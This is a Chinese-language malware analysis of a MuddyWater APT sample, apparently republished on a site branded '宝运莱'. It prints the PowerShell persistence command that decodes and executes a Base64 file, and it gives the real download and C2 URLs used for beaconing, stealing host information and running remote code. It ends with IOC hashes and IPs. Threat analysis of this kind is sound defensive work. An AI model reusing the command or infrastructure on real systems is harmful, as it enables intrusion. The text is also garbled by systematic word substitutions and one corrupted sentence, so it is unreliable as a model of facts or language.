MuddyWater（污水）最新攻击样本分析

颁布功夫 2019-05-10

MuddyWater是一个来自于伊朗的重要针对中东地域进行攻击的APT组织，其攻击指标重要集中于当局、电信及能源等领域。

近日，宝运莱官方网站金睛安全钻研团队通过VenusEye威胁谍报中心狩猎系统捕获到一个可疑文档，经过度析确认其为MuddyWater最新攻击样本。

载荷分析

攻击样本为一个Word文档，打开后会显示如下图片，诱使受害者启用宏。

宏代码执行后，会开释c:\programdata\SysTextEnc.ini文件。该文件内容为一串Base64编码数据。

而后向启动项写入如下号令行：
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nologo -w 1 -exec bypass -c "$ste=gc
c:\programdata\SysTextEnc.ini;iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($ste)))"

用于开机解密并执行c:\programdata\SysTextEnc.ini文件。解密之后为一段powershell代码，该代码用于要求hxxp://38.132.99.167/crf.txt链接的数据并执行，该链接返回的数据依然是一段Powershell代码。

宝运莱·(中国区)最新官方网站

木马分析

上述过程中下载的Powershell代码即MuddyWater组织惯用的powershell木马。

解混合后，其主函数如下所示：

顺次执行wlChecul，pmrHlsl，GECOANOO，gfxEcmdascrsltp这四个函数。其中wlChecul只是为了确认服务器筹备状态。机关如下URL并以POST方式发送要求：
http://82.102.8.101/bcerrxy.php?rCecms=BlackWater

若是返回值不为空且不为%COPYTHAT%才会执行后续函数。之后执行pmrHlsl函数，该函数会挪用WMI获取多种推算机信息。

将获得的信息使用“*”进行拼接。推算拼接后字符串的MD5，再和“*1997* EP1”进行拼接，最后进行base64编码。

之后将机关出来的Base64编码数据拼接成如下URL并以POST方式发送出去：
http://82.102.8.101/bcerrxy.php?riHl=[EncryptedData]

若是返回了局不为空并且不为%BYE%则持续后续函数的执行。接下来要执行的函数为GECOANOO。

GeCOANOO函数机关如下数据，并以POST方式将其发送出去：
http://82.102.8.101/bcerrxy.php?cienentit=[EncryptedData]

其中的EncryptedData即上一次发送数据中进行Base64编码的MD5部门。若是返回了局不为空且返回值经过base64解码后不为"SHH"，则将解码后的返回值赋值给一个全局变量gecdrEu，而后执行下一个函数，能够判断赋值给gecdrEu的数据为一段powershell代码。

最后通过gfxEcmdascrsltp函数执行全局变量中的gecdrEu中的powershell代码。

并将返回值进行base64编码，拼凑成如下的URL体式进行上传。
http://82.102.8.101/bcerrxy.php?zCre=[Base64Str]

溯源分析

通过VenusEye威胁谍报中心关联系统，我们发现了另一个早期的样本。

该样本所使用的技术都与本次我们发现的样本千篇一律。

通过溯源分析，我们发现这两个样本都与友商4月10日在社交媒体上披露的MuddyWater攻击土耳其的样本类似。下面是两者的宏代码对比。

宝运莱·(中国区)最新官方网站

通过对比能够发现，二者都使用一样的方式获取推算机信息，而后使用一样的推算方式推算受害者主机的唯一标识。

宝运莱·(中国区)最新官方网站

相比之下，早期发现的样本将上线要求、获取powershell代码、上传号令行执行了局拆分成分歧PHP进行交互。而此刻的版本则使用统一个PHP文件进行交互。并且早期版本若是在执行过程中遇到谬误，则会将谬误信息纪录日志，但是最新版本则直接实现当前法式。

对于执行流程来说，最新版本相对于早期版本也有较大分歧，二者的执行流程如下：

相比之下，最新的攻击活动增长了其基础设施，并且将主体代码搁置到远程服务器中而不是直接通过垂钓文档开释到本地�Ｄ芄豢闯龈米橹诓恍莸母缕涔セ鞣绞胶头兰觳夥绞�。

总结

MuddyWater组织自披露之初一向活跃至今，该组织极度青睐使用Powershell脚正本编写其攻击工具，并衍生出了该组织的专有木马POWERSTATS。固然该组织的Powershell木马更新换代很快，但是我们仍能从其powershell代码中看到些许POWERSTATS的影子。

威胁指标（IOC）

97bf0d6e11ee4118993ad9c4b959c916
b0de46b50e209b185987010238fc65f0
0cd84d601971a91cc023e16d94cc7e6c
82.102.8.101
38.132.99.167
http://38.132.99.167/crf.txt

解决规划

1、宝运莱官方网站VenusEye威胁谍报中心已经支持对本次攻击活动有关谍报的查问。

2、已部署宝运莱官方网站IDS、IPS产品的客户请升级事务库到最新版本，即可有效检测或阻断攻击。

3、已部署宝运莱官方网站APT检测产品的客户无需升级，即可有效检测这次攻击。

宝运莱·(中国区)最新官方网站

7*24幼时服务热线

400-624-3900

+86(10)56631988(港澳专线)

官方微信

官方微博

网御星云合多数据书生电子云子可信

司法申明

宝运莱官方网站

网络安全防护

网络安全检测

利用安全

数据安全

安全治理

云安全

工控安全

移动及终端安全

密码利用安全

大模型利用安全

专业安全服务

安全运营中心

知白学院

威胁谍报中心

安全传递

钻研汇报

安全团队

渠路系统

售后服务

升级布告

软件升级

公司概况

新闻动态

技术专题

人才招聘

投资者关系

资源中心

联系宝运莱官方网站

关于宝运莱官方网站

MuddyWater（污水）最新攻击样本分析

关于宝运莱官方网站

解决规划

安全钻研

联系宝运莱官方网站

7*24幼时服务热线